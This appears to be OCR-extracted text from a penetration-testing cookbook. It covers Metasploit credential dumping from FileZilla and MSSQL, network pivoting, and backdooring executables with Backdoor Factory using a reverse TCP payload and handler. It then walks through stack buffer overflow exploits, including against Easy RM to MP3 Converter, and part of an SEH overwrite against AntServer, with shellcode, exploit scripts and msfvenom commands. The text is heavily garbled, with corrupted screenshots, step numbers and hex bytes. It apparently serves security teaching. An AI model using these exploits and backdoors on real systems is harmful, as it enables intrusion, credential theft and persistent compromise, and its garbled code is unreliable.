Now we will try to gather the stored configuration and credentials of the FileZilla server (the FTP server 
that can be used to transfer files) that is installed on the machine. We will use the module: 


| use post/windows. gather/credentials/filezilla_server 


wplications) > search filezill 
Jatabase not connected or cache not built, 





Date 


auxiliary/dos/windows/ftp/filezilla_server_ port YAC]O] Sta Ww | 
T Denial of Service 

post/windows/gather/credentials/filezilla server 
r Credential Collectior 


We set the session and run it, and we should see the saved credentials: 


Rank 


normal 


normal 








Let's use another post-exploitation module to dump the database passwords. We will use this: 


| use exploit/windows/gather/credentials/mssql_local_hashdump 


msf > use post/windows/gather/credentials/mssql_local_hashdump 
msf post(mssql_local_hashdump) > set SESSION 2 

SESSION => 2 

msf post(mssql_local_hashdump) > run -j 





We set the session and run this using run -j. We will see the credentials on the screen: 


post (issq._ _hasheump) > run -j 

Post module running as background job 

Running module against PORTAL 

Checking if user is SYSTEM... 

User is SYSTEM 

Identified service ‘SQL Server (SQLEXPRESS)', PID: 1792 


Attempting to get password hashes... 
Sa: 0x01004D6196F9B58F9609BC51D7CF47C2C2AB821CC4DAA879A0A1L 
##MS_PolicyTsqlExecutionLogin##: 0x01008D22A249DF5EF3B79ED321563A1DCCDC9CFC5FF954DD2D0F 
##MS_PolicyEventProcessingLogin## : 0x®0100AE86B3442FF84691E83FE9D1522CF4F6268FCE@D3D692606 
MSSQL password hash saved in: /Users/xXxZombieSenpaixXx/.msf4/Loot/20161119062617_def 





Pivoting into the network 


Once we have complete control over a computer in the system, our next step should be to pivot into the 
network and try exploiting and getting access to as many machines as possible. In this recipe, you will 
learn the easy way to do that with Metasploit. 


How to do it... 


Metasploit has an inbuilt meterpreter script, that allows us to add a route and enables us to attack other 
machines in the network using the current one. The concept is really simple; all we have to do is execute 
this: 


| run autoroute -s <IP subnet> 





Once this is done, we can simply exploit the machines using the same methods that we covered in the 
previous recipes. 


Backdooring for persistence 


An important part of successful exploitation is to be able to keep access to the compromised machine. In 
this recipe, you will learn about an amazing tool known as the Backdoor Factory. The main goal of 
Backdoor Factory is to patch Windows/Linux binaries with our shell code so that the executable runs 
normally, along with executing our shell code every time it executes. 


How to do it... 


Backdoor Factory comes installed with Kali. And it can be run using backdoor-factory. To view all the 
features of this tool, we will use the help command: 


| backdoor-factory -help 


:~# backdoor-factory -h 
ackdoor.py [options] 


show this help message and exit 
--file=FILE File to backdoor 
- -shel1l=SHELL 

Payloads that are available for use. 


payloads. 
- -hostip=HOST 

IP of the C2 for reverse connections. 
--port=PORT The port to either connect back to for reverse 


or to listen on for bind shells 
--cave_jumping Select this options if you want to use code cave 
jumping to further hide your shellcode in the bi 





Usage of this tool is not too hard; however, it is recommended that the binaries be tested 
before being deployed on the target system. 


To view what options are available for a particular binary we choose to backdoor, we use the following 
command: 


| backdoor-factory -f <path to binary> -s show 


We will then use iat_reverse_tcp_stager_threaded: 


| backdoor-factory -f <path to binary> -s iat_reverse_tcp_stager_threaded -H <our IP> -P <Port> 


[ In the backdoor module 

f Checking if binary is supported 

[ Gathering file info 

f Reading win32 entry instructions 

The following WinIntelPE32s are available: (use -s) 
cave _miner_inline 
iat_reverse tcp _inline 


iat_reverse_tcp_inline_threaded 
iat_reverse tcp_stager_threaded 
iat_user_supplied_shellcode threaded 
meterpreter_reverse https_threaded 
reverse shell_tcp_inline 
reverse tcp stager_threaded 
user_supplied shellcode threaded 





Next, we choose the cave we want to use for injecting our payload: 


[*] Cave 1 length as int: 407 

[*] Available caves: 

. Section Name: None; Section Begin: None End: None; Cave begin: Ox21c 
nd: Ox3fc; Cave Size: 480 

2. Section Name: None; Section Begin: None End: None; Cave begin: Oxa0la 
End: 0xa208; Cave Size: 494 

. Section Name: .data; Section Begin: Oxa200 End: Oxe000; Cave begin: 0 


<b185 End: @Oxb3ac; Cave Size: 551 

. Section Name: .data; Section Begin: Oxa200 End: Oxe000; Cave begin: 0 
<o3f1 End: Oxd3ec; Cave Size: 8187 

. Section Name: .data; Section Begin: Oxa200 End: Oxe000; Cave begin: 0 
<de4Q End: Oxdffc; Cave Size: 444 

He 2 te fe ae te oe ote fe te ote ae fe fe ote oe ote 2 ote fe ae fe fe ote oe ate fe of fe ae ote fe ode oe ote fe of ate oe fe oe oe oe ote oo ote oe oe 

a i ‘ 





Our binary has been created and is ready to be deployed. 


Now all we need to do is to run a handler that will accept the reverse connection from our payload: 


> use expLloit/multi/handler 
expLoit ( ) > set payload windows/meterpreter/reverse tcp 
ayload => windows/meterpreter/reverse tcp 
msf exploit ( ) > set Lhost 192.168.110.41 
host => 192.168.110-41 
smsf exploit ( yes 
lport => 4444 
msf exploit ( ) > -run 


set lport 4444 





Now when the .exe is executed on the victim machine, we will have our meterpreter connected: 


Microsoft Wir 
+ ) Ce pyr Melani 


c:\Documents and Settings\test\Desktop> 





Buffer Overflows 


In this chapter, we will cover the following recipes: 


Exploiting stack-based buffer overflows 
Exploiting buffer overflow on real software 
SEH bypass 

Exploiting egg hunters 

An overview of ASLR and NX bypass 


Introduction 


In a software program, buffer overflow occurs when a program, while writing data to a buffer, overruns 
the buffer size allocated and starts overwriting data to adjacent memory locations. 


A buffer can be considered a temporary area in the memory allocated to a program to store and retrieve 
data when needed. 


Buffer overflows have been known to be exploited since long back. 


When exploiting buffer overflows, our main focus is on overwriting some control information so that the 
flow of control of the program changes, which will allow our code to take control of the program. 


Here is a diagram that will give us a basic idea of an overflow happening in a buffer: 


Write 8 characters 
| Buffer (letters 9-12) 
pes 


Instructions 


Instructions 


Instructions 
Instructions 





From the preceding diagram, we can assume this is what a program looks like. Since it is a stack, it starts 
from bottom and moves toward the top of the stack. 


Seeing the preceding diagram, we also notice that the program has a fixed buffer to store 16 letters/bytes 
of data. 


We first enter the 8 characters (1 char=1 byte); on the right-hand side of the diagram, we can see that they 
have been written in the buffer of the program's memory. 


Let's see what happens when we write 20 characters into the program: 


Instructions Instructions 


Instructions Instructions 


Instructions Instructions 
Directs program to 
hacker’s code 
es 


Return Address 


Buffer (letters 13-16) 


Write 20 characters 
Buffer (letters 9-12) ————————— 


Buffer (letters 5-8) 


Buffer (letters 1-4) 


Instructions 


Instructions 


Instructions 





Source: http://www.cbi.umn.edu/ 


We can see that data is correctly written upto 16 characters, but the last 4 characters have now gone out of 
the buffer and have overwritten the values stored in the Return Address of the program. This is where a 
classic buffer overflow occurs. 


Let's look at a live example; we will take a sample code: 


#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 
int main(int argc, char *argv[]) 


{ 
char buffer[5]; 
if (argc < 2) 
printf("strcpy() NOT executed....\n"); 
printf("Syntax: %s <characters>\n", argv[0]); 
exit(0); 
} 
strcpy(buffer, argv[1]); 
printf("buffer content= %s\n", buffer); 
// you may want to try strcpy_s() 
printf("strcpy() executed...\n"); 
return 0; 
} 


The preceding program simply takes an input at runtime and copies it into a variable called burrer. We can 
see that the size of the variable buffer is set to s. 


We now compile it using this command: 


| gcc program.c -o program 
We need to be careful as gcc by default has inbuilt security features, which prevent buffer overflows. 


We run the program using this command: 


| ./program 1234 


We see that it has stored the data and we get the output. 


Let's now run this: 


| ./program 12345 
We will see the program exits as a segmentation fault. This is the enabled security feature of gcc. 


We will learn more about the return address in the next recipe. However, overwriting the return address 
with our own code can cause a program to behave differently from its usual execution and helps us in 
exploiting the vulnerability. 


Fuzzing is the easiest way to discover buffer overflows ina program. There are various fuzzers available 
in Kali, or we can write a custom script to make our own, depending on the type of program we have. 


Once fuzzing is done and a crash occurs, our next step is to debug the program to find the exact part where 
a program crashes and how we can use it to our advantage. 


Again, there are multiple debuggers available online. My personal favorite for Windows is Immunity 
Debugger (Immunity Inc.). Kali also comes with an inbuilt debugger, GDB. It is a command-line 
debugger. 


Before we jump any further into more exciting topics, note that there are two types of overflows that 
usually happen in a program. 


There are mainly two types of buffer overflows: 


e Stack-based overflows 
e Heap-based overflows 


We will be covering these in more detail in the later part of the chapter. For now, let's clear up some 
basics, that will help us in exploiting overflow vulnerabilities. 


Exploiting stack-based buffer overflows 


Now that our basics are clear, let's move on to the exploitation of stack-based buffer overflows. 


How to do it... 


The following steps demonstrate the stack-based buffer overflow: 


1. Let's take a look at another simple C program: 


#include<stdio.h> 
#include<string.h> 
void main(int argc, char *argv[]) 


char buf[120]; 
strcpy(buf, argv[1]); 
printf (buf); 


This program uses a vulnerable method strcyp(). We save the program to a file. 


2. We then compile the program with gcc using the fno-stack-protector and execstack: 


| gcc -ggdb name.c -o name -fno-stack-protector -z execstack 


3. Next, we turn off address space randomization using this: 


| echo 0 > /proc/sys/kernel/randomize_va_space 


4. Now we open our program in gab using this command: 


| gdb ./name 


The following screenshot shows the output of the preceding command: 


:~/Desktop# gdb ./name 
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1 
Copyright (C) 2014 Free Software Foundation, Inc. 
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> 
This is free software: you are free to change and redistribute it. 
There is NO WARRANTY, to the extent permitted by law. Type "show copying" 
and "show warranty" for details. 
This GDB was configured as "i586-lLinux-gnu". 
Type "show configuration" for configuration details. 
For bug reporting instructions, please see: 
<http://www.gnu.org/software/gdb/bugs/>. 
Find the GDB manual and other documentation resources online at: 
<http://www.gnu.org/software/gdb/documentation/>. 
For help, type "help". 
Type “apropos word" to search for commands related to 
Reading symbols from ./name...done. 
(gdb) _ 


“ATO ale pane 





5. Next, we supply our input using Python using the following command: 


r $(python -c ‘print "A"*124' 
p 


The following screenshot shows the output of the preceding command: 


(gdb) r $(python -c ‘print "A"*124') 
Starting program: /root/Desktop/test $(python -c ‘print "A"*124') 


Program received signal SIGSEGV, Segmentation fault. 
Ox41414141 in ?? () 





6. We can see that the program crashed and it shows error ox41414141. This just means that the character 


we entered, a, has overwritten the EJP. 


7. We confirm it by typing i r: 


10. 


Tt; 


ih, 


Ox7c 124 

(Cbd oh mum im 74010) - 1073745408 

Oxb7fb3858 - 1208272808 

(Ch:4 oN am o¥40]010) - 1208279040 

ff ff200 Oxbf f f F200 

0x0 

0x0 C) 

0x0 6) 

0x41414141 0x41414141 

0x10286 [ PF SF IF RF ] 





This shows us that the value of the EIP register has been successfully overwritten. 

Next, we find the exact byte that overwrites the EIP. We can do this by entering different characters 
in our program and then checking which of them overwrites the EIP. 

So we run the program again, this time, with different characters: 


r $(python -c 'print "A"*90+"B"*9+"C"*25') 


The following screenshot shows the output of the preceding command: 


Starting program: /root/Desktop/test $(python -c ‘print "A"*90+"B"*9+"C"*25' ) 


Breakpoint 1, main (argc=2, argv=Oxbffff2c4) at test.c:6 
6 strcpy(buf, argv[1]); 
(Gelele) ne 


Continuing. 


Breakpoint 2, main (argc=1128481603, argv=0x43434343) at test.c:7 
7 printf (buf); 


(e[e|e) ae 
Continuing. 


Program received signal SIGSEGV, Segmentation fault. 
0x43434343 in ?? () 





This time, we see that the EIP has the value cccc. This implies that the bytes we need are somewhere 
in the last 25 characters we supply. 


We similarly try different combinations of 124 characters until we have the position of the exact 4 
characters that overwrite the EIP: 


i. 


14. 


Starting program: /root/Desktop/test $(python -c ‘print "A"*100+"B"*4+"C"*20' ) 


Breakpoint 1, main (argc=2, argv=Oxbffff2c4) at test.c:6 
le} strcpy(buf, argv[1]); 

(Gelele) ane 

Continuing. 


Breakpoint 2, main (argc=1128481603, argv=0x43434343) at test.c:7 
7 print f (buf) ; 

(Gelolo) te 

Continuing. 


Program received signal SIGSEGV, Segmentation fault. 
Ox42424242 in ?? () 





Now, since we have found the exact location of the EIP, and in order to perform a successful 
exploitation, we need to overwrite these 4 bytes with the memory address where we will store our 
shellcode. We have about 100 bytes in the memory where « is stored currently, which is more than 
enough for our shellcode. So, we need to add breakpoints in our debugger, where it will stop before 
jumping to the next instruction. 

We list the program using the 1ist s command: 


(gdb) list 8 
fe void main(int argc, char *argv[]) 
{ 
char buf[120]; 
strcpy(buf, argv[1]); 
printf (buf); 
} 
fe[o|e) mole) 
Breakpoint 1 at 0x8048451: file test.c, line 6. 
(elolo) omer 
Breakpoint 2 at 0x8048469: file test.c, line 7. 
eles) 


a~OANOMNFW 





15. And we add our breakpoints in the line where the function is called and after it is called using b 


<linenumber>. 


16. Now we run the program again, and it will stop at the breakpoint: 


(gdb) r $(python -c ‘print "A"*100+"B"*20+"C"*4' ) 
The program being debugged has been started already. 
Start it from the beginning? (y or n) y 


Starting program: /root/Desktop/test $(python -c ‘print "A"*100+"B"*20+"C"*4' 


Breakpoint 1, 0x0804843b in main () 
(gdb) c 
Continuing. 





17. We press c to continue. 
18. Now let's see the esp (stack pointer) register: 


x/16x $esp 


The following screenshot shows the output of the preceding command: 


(gdb) x/16x $esp 


Oxbffff190: 
Oxbffffla0: 
Oxbt fff 1b0: 


Ob oN mint 74010) 
0x41414141 
0x41414141 
0x41414141 


Oxbf ff f198 
Ox4c554cf f 
Ope Te belel T1010) 
Oxb7 fb2000 
Oxbf ff f190 
Oxbffff218 
Ob 40) 0) 
0x0 0) 
0x8048469 
Ox286 
Ox73 115 
Ox7b 123 
Ox7b 123 
Op we) 123 
Op) 0 
0x33 51 





Op dolololololololo) 
0x41414141 
0x41414141 
0x41414141 


- 1073745512 
4s lOlelalslels i 
1297501696 
a ACLs MAAC ]OL-2C) 
Oxbf f ff 190 
Oxbf f ff218 


0x41414141 
0x41414141 
0x41414141 
0x41414141 


0x8048469 <main+46> 


[ PF SF IF ] 


0x41414141 
0x41414141 
0x41414141 
0x41414141 


19. This will show us 16 bytes after the esp register, and on the left-hand side column, we will see the 
memory address corresponding to the data being stored. 


20. Here, we see that data starts at address oxbrrrri90. We note the next memory address, oxbfrriao. This is 
the address we will use to write in the EIP. When the program overwrites the EIP, it will make it 
jump to this address, where our shellcode will be stored: 


(gdb) r $(python -c ‘print "A"*100+"B"*4+"C"*20' ) 
The program being debugged has been started already. 
Start it from the beginning? (y or n) y 


Starting program: /root/Desktop/test $(python -c ‘print "A"*100+"B"*4+"C"*20' ) 


Breakpoint 1, main (argc=2, argv=Oxbffff2c4) at test.c:6 
6 strcpy(buf, argv[1]); 


(gdb) x/60x $esp 


(0) 0) m0 0 
Oxbffff210: 
Oxbftfff220: 
Oxbf fff230: 
Oxbtfff240: 
Oxbtfff250: 
Oxbffff260: 
Oxbtfff270: 





2, main (argc=1128481603, 


printf (buf) ; 


Oxb7f F8200 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x43434343 
0x43434343 
0x08048480 
op aclolololeloloy4 
lop aclolololelolo yy 
0x0804822c 
Op aclolololelololo) 
op aclolololeyelolo 


Op aclololololelolo) 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x43434343 
Oxbf f f F200 
op aclolololelelolo) 
Oxbf ff f2c4 
Oxbf ff f2c4 
Op oval e¥A0]010) 
Ox559211f2 
op aclolololeyeyolo) 


argv=0x43434343) 


0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
0x41414141 
9x41414141 
x43434343 
4010 ]010[010]0]0) 
op <olololololololc) 
Ixbf f f f2d0 
xbf f f F264 
opaclololololololo) 
0x611bb5e2 
op aclolololcloloy4 








at test.c:7 


0x41414141 
0x41414141 
0x41414141 
0x41414141 
OC 
0x41414141 
Ox42424242 
0x43434343 
Oxb7e5b723 
Oxb7e5b723 
Oxb/fed/9a 
0x0804a014 
(Op aolololololololo) 
Op aclolololelololo 
0x08048340 


21. Let's try to open a shell by exploiting the overflow. We can find the shellcode that will execute a 
shell for us on Google: 





22, 
22. 


24. 


Zo: 


https://www.exploit-db.com/exploits/39 160/ 
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Path pase Home Exploits Shellcode Papers Google Hacking Database Submi' 


Linux/x86 - execve "/bin/sh" Shellcode (24 bytes) 


DB-ID: 39160 Author: Dennis ‘dhn' Herrmann Published: 2016-01-04 
VE: N/A Type: Shellcode Platform: Lin_x86 


-DB Verified:() Shelicode: § Download / [View Raw _ Shellcode Size: 24 bytes 


revious Exploit 
/* 
3 Title: Linux/x86 execve "/bin/sh" - shellcode 24 byte 
3 Platform: linux/x86 
3; Date: 2015-01-63 
3; Author: Dennis 'dhn' Herrmann 
; Website: https://zer@-day.pw 


BITS 32 


We have 100 bytes and our shellcode is 24 bytes. We can use this one in our exploit. 
Now we simply replace the as with the 76 no op assembly instruction (0x90) and the rest of the 24 
bytes with the shellcode, then the ss with the memory address we want the EIP to point to, and cs 
with the no op code again. This should look something like this: 

"\x90"*764+"\x6a\xObx58x31\xf6\x56\ x68\x2F\x2F\x73\x68\x68\ 


x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" 
+"\xa0\xff\xf1\xbf"+"\x90"*20 


Let's rerun the program and pass this as an input: 


r $(python -c print’ "\x90"*76+"\x6a\x0bx58x31\xf6\x56\x68\ 
X2F\x2F\x73\x68\x68\x2F\x62\x69\x6eE\x89\xe3\x31\xc9\x89\xca\ 
xcd\x80"+"\xaO\xff\xf1\xbf"+"\x90"*20' ) 


We type c to continue from breakpoints, and once execution is done, we will have our shell executed. 


Exploiting buffer overflow on real software 


You have learned the basics of exploitation earlier. Now let's try these on some of the software already 
exploited long ago and with public exploits available. In this recipe, you will learn about publicly 
available exploits for old software and create your own version of the exploit for it. 


Before we begin, we will need an old version of a Windows OS (preferably, Windows XP) and a 
debugger for Windows. I have used Immunity Debugger and an old software with a known buffer 
overflow vulnerability. We will use Easy RM to MP3 Converter. This version had a buffer overflow 
vulnerability in playing large M3U files. 


Getting ready 


The free version of Immunity Debugger can be downloaded at https://www.immunityinc.com/products/debugger/. 


How to do it... 


Follow the given steps to learn about it: 


1. Next, we download and install our MP3 converter on the machine. 

2. This converter had a vulnerability in playing M3U files. The software crashed when a large file was 
opened for conversion with it. 

3. Let's create a file with about 30,000 as written into it and save it aS <filename>.m3u: 


f Untitled - Notepad Cem) | 
File Edit Format Yiew Help 


Easy RM to MP3 Converter 


Easy RM to MP3 Converter has encountered a problem { a 
and needs to close. We are sorry for the inconvenience. € o 


If you were in the middle of something, the information you were working on 
tight be lost. 


Please tell Microsoft about this problem. 
We have created an error report that you can send to us. We will treat 
this report as confidential and anonymous. 


To see what data this error report contains, click here. 


Send Error Report 





5. Now we need to find the exact number of bytes that cause the crash. 


6. Typing so many as manually ina file will take a lot of time, so we write a simple Python program to 
do that for us: 


import io 
a="A"*30000 


file =open("crash.m3u", "w") 
file.write(a) 
file.close() 


7. Now we play around with bytes to find the exact value of the crash. 
8. In our case, it came out to be 26,105 as the program did not crash at 26,104 bytes: 


“Easy RM to MP3 Converter - i X 


AadAaia 22h a3A agA 254 aba 7A aaA a9Ab0A biA b2A b3A b4A, DSADBADTADEA 


Press ‘Load’ or drag the ready files to the interface! 
Purchase i Batch Start 
9. Now, we run our debugger and attach our running converter program to it by navigating to File | 
Attach: 
+ Immunity Debugger - [ce 
isi) View Debug Plugins 


kK Open F3 ; 1 
Attach = Ctri+F1 





Exit Alt+x 


10. Then, we select the process name from the list of running programs: 


Select process to attach 


feel 


[attach | Cancel | 


11. Once it is attached, we open our M3U file in the program. We will see a warning in the status bar of 
the debugger. We simply click on continue by pressing the F'9 key or clicking on the play button from 





the top menu bar: 





Kp] MEH SEL a ob 








12. We will see that the EIP was overwritten with as and the program crashed: 


12: 


14. 


15. 


16. 


17, 
18. 


19. 
20. 
21. 


22, 


D ntdll. 70916050 


@(FFFFFFFF) 
@( FFFFFFFF)} 
@( FFFFFFFF) 
dddddda 
7FFDDGOG( FFF} 





Now we need to find the exact 4 bytes that cause the crash. We will use the script from Kali known 
as pattern create. It generates a unique pattern for the number of bytes we want. 


We can find the path of the script using the locate command: 
locate pattern_create 


The following screenshot shows the output of the preceding command: 


EEN. ASRS pre Be SG 


File Edit View Search Terminal Help 
B Bhaiki# Locate pattern create 
sr/share/metasploit -framework/tools/exploit/pattern_create.rb 





Now that we have the path, we run the script and pass the number of bytes: 


ruby /path/to/script/pattern_create.rb 5000 


We used 5,000 because we already know it will not crash at 25,000, so we only create a pattern for 
the next 5,000 bytes. 

We have our unique pattern. We now paste this in our M3U file along with 25,000 as. 

We open up our application and attach the process to our debugger: 


Select process to attach 





es 


[attach | Cancel 


We then drag and drop our M3U file into the program. 
It crashes and we have our EJP overwritten with 42386b42. 
Metasploit has another great script to find the location of the offset: 


ruby /path/to/script/pattern_offset.rb 5000 


Now we have the offset match at 1104; adding it to the 25,000 as, we now know that EIP is 


pe B 


24. 
pase 


26. 


27, 


overwritten after 26,104 bytes: 


:/media/sf Downloads/BOOK# ruby /usr/share/metaspLoit -framework/t 
ools/exploit/pattern_offset.rb -q 0x42386b42 





[*] Exact match at offset 1104 


Next, we need to find out a reliable way of jumping to the shellcode. We do this by simply writing 
extra random characters into the stack after EIP, making sure the shellcode we write will be written 
properly into the memory. 

We run the program, attach it to the debugger, and let it crash. 

We will see the EIP has been overwritten successfully. In the window in the bottom-right corner, we 
right-click and select Go to ESP: 


a7 AaShaSAbGAb 1 Ab2AbSAb4SAbSAbBEAB/ABSAbSACEAC IAC 


Address 

Hide dump 

Show UNICODE dump 
Lock stack 


Copy to clipboard Ctrl+C 
Modify 

Edit Ctrl+E 
Push DWORD 

Pop DWORD 

Search for address 

Search For binary string Ctrl+B 


Go to ESP ” 
Go to EBP 
Go to expression Ctrl+G 


Appearance 





Here, we notice that the ESP actually starts from the 5th byte. To make sure our shellcode is executed 
properly, we now need to make sure shellcode starts after 4 bytes. We can insert four NOPs to fix 
this: 





Since we have control over EIP, there are multiple ways to execute our shellcode, and we will cover 
two of them here. The first one is simple: we find the jmp esp instruction in the code and overwrite the 
address with it. To do that, we right-click and navigate to Search for | All commands in all modules: 





Backup > Name (label) in current module Ctrl+N 
Copy > Name in all modules 

Binary > 
Assemble Space 

Label : 


Pancas oak 


All Commands in all modules 
All sequences in all modules 


28. We type the jmp esp instruction: 


' Find all commands 


Cancel | 





29. Inthe results box, we see our instruction, and we copy the address for our exploit. 


30. Let's write an exploit now. The basic concept would be junk bytes + address of jump ESP + NOP bytes + 


Shellcode: 





File Edit Search Options Help 

import io 
a="A"*26104+"\x3A\xF2\xA8\x01"+"\xB8\xFF\ xXEF\ xXFF\xXFF\XF7\xDO\ x2B\ xE0\ x55\ x8B\ xEC\ x33\ XFF\ xX57\ x83\ xEC\ x04 
\xC6\x45\ xF8\ x63\ xC6\ x45\ xF9\ x61\ xC6\ x45\ xFA\ x6C\ xC6\ x45\ xFB\ x63\ x8D\ xX45\ xF8\ x50\ xBB\ XC7\ x93\ XBF\ X77\ XFF 
\xD3"+"\x90"*100 

file = open("crash.m3u","w") 
file.write(a) 

file.close() 








31. We can generate the shellcode of the calculator: 


msfvenom windows/exec CMD=calc.exe R | msfencode -b 
"\xOO\xOA\xOD' -t c 


32. Now we run the exploit, and we should see the calculator open once the program crashes! 


BFFODD POP EDI 
FODE = 


FFDEG . E Calculator 
4 als 


6 (NO,NB,E, BE, NS, PE, GE, LED 
Edit View Help . 


SPUOZDI 


Let's try another method; suppose there are no jmp esps available for us to use. In this case, we can 
use push esp and then use the ret instruction, which will move the pointer to the top of the stack and 
then call the esp. 

We follow the same steps until step 25. Then, we right-click and go to Search for | All sequences in 


all modules. 
Here, we type push esp ret? 


DWORD PTR FS:(0] 
se PTR FS:(01, ESP 


5S: CEBP-181],ESP @( FFEFFFFE 


DWORD PTR SS: CEBP-41, EBX F : ah pada 
PUSH = BF % i 7FFOESSB I 
AL DWORD PTR DOS: (<&MSVUCRT.__set_app_t: 5 
POP ECX 
@ OR DWORD PTR OS: (47BEFCI,F ERROR SUCCESS 
DWORD PTR DS: (47BF66],FFFFFFFF F mt eae ie tipster 
“SU. DWORD PTR OS: C<&MSUCRT._ p__fmode> 6 (NO,NB,E,BE,N 
WY BWORD PTR DSsCERRI Eee RA! and 'R hes 0 
0 ¢ OS: CEAKI, ECs int: 'RA' and 'RB' match A32, ‘ANY n' matches 0..n commands 
DUCRD PRR BSL ECRSICRT.__p__commod Hint: 'RA' and 'RB' match R32. ‘ANY n' mate 1 command 
ECX,DWORD PTR OS: C47BEECI IS . : 
DUOR' 2 DS: LEAK, ECX iv Entire block Cancel 
e PTR DOS: C<&MSUCRT._adjust_ 
) EAX,DWORD PTR OS: CEAX] 
DWORD PTR OS: (47BEFS1,EAx 
Cond 1 ; G 
Prec NEAR,S3 


DWIORD PTR DS: (44A8Ca1, EBX 


Direc 
> tory you 
wish to 


output oduleEntryPoint 





36. Inthe result, we see we have the sequence in the address: o18F.pss. 


37. Now we simply replace the EIP address in our exploit code with this and run the exploit, and we 
should have a calculator open up: 





> BYTE 
AL,A 


| Calculator 


Edit View Help. 


bad +NaN 


pty 





Backspace| 2 | 








| i | sqrt 


IG 


Address | Hex dump 
LLY 


86 
oj JL JL J| 
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oegeteeee 


FO4¢ G iy 19) 





SEH bypass 


Before we start, we need to understand what SEH is. SEH stands for structured exception handling. We 
may have often seen programs popping up an error saying the software has encountered a problem and 
needs to close. This basically means it's the default exception handler of Windows kicking in. 


SEH handlers can be considered the block of try and catch statements that are executed in order when 
there's an exception in the program. This is what a typical SEH chain would look like: 





stack 








top 


Pointer to next SEH record >| Exception_handileri() 
Pointer to Exception Handler 


Pointer to next SEH record > Exception_handler2() 
| Pointer to Exception Handler 


‘ 





2x 4 bvtes 
A. 


2x 4 bytes 





Pointer to next SEH record » Exception_handler3() 


| Pointer to Exception Handler 


OxFFFFFF > MSVCRT!lexhandler 
| Default exception handler bottom 


2x 4 bytes 
A 


f 


2x 4 bytes 
A 











Source: https://www.corelan.be/wp-content/uploads/2009/07/image_thumb45. png 


When an exception occurs, the SEH chain comes to the rescue and handles the exception based on its type. 


So, when an illegal instruction occurs, the application gets a chance to handle the exception. If no 
exception handler is defined in the application, we will see an error shown by Windows: something like 
Send a report to Microsoft. 


To perform a successful exploitation of a program with the SEH handler, we first try to fill the stack with 
our buffer and then try to overwrite the memory address that stores the first SEH record chain. However, 
that is not enough; we need to generate an error as well, that will actually trigger the SEH handler and 
then we will be able to gain complete control over the execution flow of the program. An easy way is to 
keep filling the stack all the way down, which will create an exception to be handled, and since we 
already have control over the first SEH record, we will be able to exploit it. 


How to do it... 


In this recipe, you will learn how to do this: 


1. Let's download a program called AntServer. It has a lot of public exploits available, and we will try 
to build our own exploit for it. 

2. We will install it on the Windows XP SP2 machine that we used in the previous recipe. 

3. AntServer had a vulnerability that could be triggered by sending a long USV request to the AntServer 
running on port 6é6ee: 


Select process to attach 


(o\&) 
[a | 


Cancel | 





4. Let's run the AntServer by opening the software and navigating to Server | Run Service Control...: 


(& BigAnt Console Ec) (El) 


File Actions Import EERIE) Options Help 


Run Service Control... i @) 


User Management - 
Start H i Stop Start All Restart All Stop All 


Server Name Description Status 
All Users AntServer BigAnt Messaging Service Running 
AyServer BigAnt Audio&Video Service Running 
bY, AntDS BigAnt Document Service Running 








5. Now let's write a simple Python script, that will send a large request to this server on port 6600: 


#!/usr/bin/pythonimport socket 

import socket 

address="192.168.110.6" 

port=6660 

buffer = "USV " + "\x4i" * 2500 + "\r\n\r\n" 
sock=socket.socket(socket.AF_INET, socket .SOCK_STREAM) 
connect=sock.connect((address, port) ) 
sock.send(buffer ) 

sock.close() 


6. Coming back to the Windows machine, let's start Immunity Debugger and attach the process 
AntServer.exe to it. And then, click on run. 


7. Once the program is running, we run our Python script from Kali, and in our Debugger, we will see a 


violation error. However, our EIP has not been overwritten yet: 


view | Debug Plugins ImmLib Opt 


Log Alt+L 
Executable modules = Alt+E 
Memory Alt+M 
Threads 

Windows 

Handles 

CPU Alt+C 
SEH chain Alt+S 
Patches Ctrl+P 


Call stack Alt+K 


8. Inthe File menu in the debugger, we go to View | SEH chain. Here, we will see that the address has 


10. 


i 


12, 


been overwritten by aaaa. Now we press Shift+ F9 to pass an exception to the program. We will see 
that the EIP has been overwritten, and we get an error: 


SEH chain of thread 000... {E |(E|{X] 


t 





We will also notice that the other register values have now become zero. This zeroing of registers 
was introduced in Windows XP SP1 and later in order to make SEH exploitation more difficult. 


We are using Windows XP SP2. It has a feature called SAFESEH. When this option is enabled in the 
module, only the memory addresses listed on the registered SEH handlers list can be used, which 
means if we use any address that is not on the list, from a module compiled with /saresen on, the SEH 
address will not be used by the Windows exception handler and the SEH overwrite will fail. 

There are a few ways to bypass this, and this is one of them: using an overwrite address froma 
module that was not compiled with the /saresen on OF IMAGE_DLLCHARACTERISTICS_NO_SEH Options. 

To find that, we will use a plugin called mona for Immunity Debugger. It can be downloaded from htt 
ps://github.com/corelan/mona: 


https://github.com/corelan/mona 


som 


< Hack The Planet - I... 97K Men's Stand U... [| abxx [| J Hack Forums (§) Kaotic Creations #5 techorgan 


ooo 





corelancOd3r version bump 


.travis.yml remove comment 

=| LICENSE Initial commit 
README.md Updated readme (installation instructions) 
VERSION added new function 'copy' to mona 
mona.py version bump 


EE] README.md 


13. We simply copy the Python file into the pycommands folder of the Immunity application. 


14. Let's move on to making the exploit. We have seen that the EIP has already been overwritten. Now 
we will try to find the exact bytes at which the crash occurs using the pattern create script in Kali 
Linux: 


| ruby /path/to/script/pattern_create.rb -1 2500 


The following screenshot shows the output of the preceding command: 


K# /usr/share/metasploit -framework/tools/exploi 


ReTAGeaceh Gk inc onegi acs DAT 
ANEIAESAL SRT TATRA EAAUG AEs NUBAY 


6Ba7Ba8Ba9RbGBb 1 Bb2Bb 3Bb 4BbSBbSBb7BbSBb9Bc OBc 1Bc 2B¢ 3Bc4BCSBc6 c7Bc8Bc9Bd@Bd1Bd2 8 
d3Bd4Bd5Bd6Bd7Bd8Bd9Be0Bel Be2Be3Be4Be5Be6Be/7Be8Be9B FOBTIBF2BF3BF4Bf5BfEBT7Bf8BT9 
